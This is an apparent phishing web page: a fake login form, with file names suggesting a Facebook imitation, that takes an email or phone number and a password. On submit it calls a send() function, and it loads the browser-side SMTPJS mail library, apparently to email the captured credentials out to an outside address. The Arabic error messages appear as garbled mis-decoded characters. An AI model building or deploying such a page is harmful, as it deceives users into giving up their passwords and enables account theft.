<!DOCTYPE html>

<html>

<head>
<title>aimil</title>
<link rel="stylesheet" href="face.css">
</head>
<body oncontextmenu="">

<div id="login">



<form onsubmit = "send(); reset(); return false;" id = "form">
<div id = "log">
<input id="text_email" placeholder="Email or phone" type="text">
 <div id = "error_email">íÑÌí ÅÏÎÇá ÇáÇíãíá Çæ ÑŞã ÇáåÇÊİ </div>
<br><br>
<input id="text_pass" placeholder= "password" type="password"> 
<div id = "error_pass">íÑÌí ÅÏÎÇá ßáãÉ ÇáãÑæÑ ÕÍíÍ</div>
<br><br>
<input type = "submit" value = "LOG IN" id = "button">

</div>
</form>



<script src="face.js"></script>
<script src="https://smtpjs.com/v3/smtp.js"></script>





</body>
</html>